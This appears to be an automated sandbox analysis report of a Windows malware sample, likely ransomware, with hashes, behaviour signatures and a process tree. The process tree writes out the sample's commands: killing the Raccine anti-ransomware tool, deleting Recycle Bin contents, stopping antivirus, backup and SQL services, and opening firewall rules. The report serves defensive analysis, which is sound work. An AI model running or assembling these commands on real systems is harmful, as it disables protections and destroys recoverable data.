Overview
overview
10Static
static
100361e25d7f...le.exe
windows7_x64
100361e25d7f...le.exe
windows10_x64
10121c11c405...le.exe
windows7_x64
9121c11c405...le.exe
windows10_x64
916e6e08c37...le.exe
windows7_x64
916e6e08c37...le.exe
windows10_x64
91d4db8733c...le.exe
windows7_x64
101d4db8733c...le.exe
windows10_x64
101e189b1013...le.exe
windows7_x64
101e189b1013...le.exe
windows10_x64
102033194ab3...le.exe
windows7_x64
102033194ab3...le.exe
windows10_x64
821dd66ef4b...le.exe
windows7_x64
1021dd66ef4b...le.exe
windows10_x64
102d3d1b8306...le.exe
windows7_x64
82d3d1b8306...le.exe
windows10_x64
847b51b615f...le.exe
windows7_x64
1047b51b615f...le.exe
windows10_x64
84fefb51009...le.exe
windows7_x64
104fefb51009...le.exe
windows10_x64
105026eddb6f...le.exe
windows7_x64
105026eddb6f...le.exe
windows10_x64
1050ece411c1...le.exe
windows7_x64
1050ece411c1...le.exe
windows10_x64
10551129c0d4...le.exe
windows7_x64
551129c0d4...le.exe
windows10_x64
1058bfb9fa88...le.exe
windows7_x64
58bfb9fa88...le.exe
windows10_x64
105e088eb0eb...le.exe
windows7_x64
105e088eb0eb...le.exe
windows10_x64
105e998fa65c...le.exe
windows7_x64
105e998fa65c...le.exe
windows10_x64
10Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 09:57
Static task
static1
Behavioral task
behavioral1
Sample
0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral16
Sample
2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral18
Sample
47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral30
Sample
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
Resource
win10v20210408
General
-
Target
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
-
Size
115KB
-
MD5
5584b055a41bad2ebd33c88e9f6ebf64
-
SHA1
76b0d1fe179a03d3b62f11a07030edf510d9c7fa
-
SHA256
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58
-
SHA512
23628cd1081bbc5679ca4b8dac50b17c2004ad787e1d64de2685a8e23eb99a9ae37343f29983bee2cab0b08f61f06d40f877139fb458367c207d64691aa94f14
Malware Config
Signatures
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 6 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 8056 4128 icacls.exe 4200 icacls.exe 4808 icacls.exe 8088 8064 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2740 taskkill.exe 3192 7716 11056 2600 taskkill.exe 4808 taskkill.exe 11200 9616 4120 taskkill.exe 7932 7660 7628 14780 4540 taskkill.exe 4268 taskkill.exe 7820 17556 5104 taskkill.exe 10380 1652 taskkill.exe 15536 4148 taskkill.exe 4108 7924 7812 1744 4224 taskkill.exe 10352 7844 7652 7588 4592 taskkill.exe 4836 taskkill.exe 3864 9352 7956 4984 6988 4732 taskkill.exe 17672 8004 3848 taskkill.exe 4576 taskkill.exe 4528 taskkill.exe 17540 7868 4644 1692 taskkill.exe 4136 taskkill.exe 4404 taskkill.exe 7884 15540 2832 taskkill.exe 4180 8932 7772 8748 4472 taskkill.exe 3996 taskkill.exe 1004 7644 15560 4932 taskkill.exe 1532 taskkill.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exepid process 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe Token: SeDebugPrivilege 3996 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exenet.exenet.exenet.exeConhost.exenet1.exenet.exeConhost.exenet1.exedescription pid process target process PID 3400 wrote to memory of 3996 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe taskkill.exe PID 3400 wrote to memory of 3996 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe taskkill.exe PID 3400 wrote to memory of 3672 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe reg.exe PID 3400 wrote to memory of 3672 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe reg.exe PID 3400 wrote to memory of 428 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe reg.exe PID 3400 wrote to memory of 428 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe reg.exe PID 3400 wrote to memory of 3428 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe schtasks.exe PID 3400 wrote to memory of 3428 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe schtasks.exe PID 3400 wrote to memory of 2976 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe cmd.exe PID 3400 wrote to memory of 2976 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe cmd.exe PID 3400 wrote to memory of 2120 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 2120 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3928 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3928 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3892 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3892 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3984 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3984 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3112 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe cmd.exe PID 3400 wrote to memory of 3112 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe cmd.exe PID 3400 wrote to memory of 4048 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 4048 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 1348 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 1348 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3464 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3464 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 652 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 652 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe sc.exe PID 3400 wrote to memory of 3336 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe netsh.exe PID 3400 wrote to memory of 3336 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe netsh.exe PID 3400 wrote to memory of 2772 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net.exe PID 3400 wrote to memory of 2772 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net.exe PID 3400 wrote to memory of 1840 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net.exe PID 3400 wrote to memory of 1840 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net.exe PID 3400 wrote to memory of 3136 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net.exe PID 3400 wrote to memory of 3136 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net.exe PID 2772 wrote to memory of 2604 2772 net.exe net1.exe PID 2772 wrote to memory of 2604 2772 net.exe net1.exe PID 1840 wrote to memory of 3564 1840 net.exe net1.exe PID 1840 wrote to memory of 3564 1840 net.exe net1.exe PID 3136 wrote to memory of 3720 3136 net.exe net1.exe PID 3136 wrote to memory of 3720 3136 net.exe net1.exe PID 3400 wrote to memory of 3632 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe Conhost.exe PID 3400 wrote to memory of 3632 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe Conhost.exe PID 3400 wrote to memory of 1016 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net1.exe PID 3400 wrote to memory of 1016 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net1.exe PID 3632 wrote to memory of 3904 3632 Conhost.exe Conhost.exe PID 3632 wrote to memory of 3904 3632 Conhost.exe Conhost.exe PID 1016 wrote to memory of 3876 1016 net1.exe net1.exe PID 1016 wrote to memory of 3876 1016 net1.exe net1.exe PID 3400 wrote to memory of 3684 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net.exe PID 3400 wrote to memory of 3684 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net.exe PID 3400 wrote to memory of 2152 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe Conhost.exe PID 3400 wrote to memory of 2152 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe Conhost.exe PID 3684 wrote to memory of 2144 3684 net.exe net1.exe PID 3684 wrote to memory of 2144 3684 net.exe net1.exe PID 2152 wrote to memory of 3480 2152 Conhost.exe net1.exe PID 2152 wrote to memory of 3480 2152 Conhost.exe net1.exe PID 3400 wrote to memory of 2492 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net1.exe PID 3400 wrote to memory of 2492 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe net1.exe PID 2492 wrote to memory of 2676 2492 net1.exe net1.exe PID 2492 wrote to memory of 2676 2492 net1.exe net1.exe PID 3400 wrote to memory of 2688 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe Conhost.exe PID 3400 wrote to memory of 2688 3400 2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe Conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:3672
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:428
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:3428
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:2976
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:2120
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:3892
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:3928
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:3984
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:4048
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1348
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:3112
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:3464
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:652
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:3336
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start Dnscache /y2⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵PID:2604
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop bedbg /y2⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:3720
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start FDResPub /y2⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵PID:3564
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:1016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:3876
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start SSDPSRV /y2⤵PID:3632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵PID:3904
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start upnphost /y2⤵PID:3684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵PID:2144
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EhttpSrv /y2⤵PID:2152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵PID:3480
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MMS /y2⤵PID:2492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:2676
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:2688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:3480
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ekrn /y2⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵PID:512
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mozyprobackup /y2⤵PID:2584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:4020
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:3480
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:3000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵PID:4020
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:2732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:3408
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPSecurityService /y2⤵PID:3268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:2596
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:1872
-
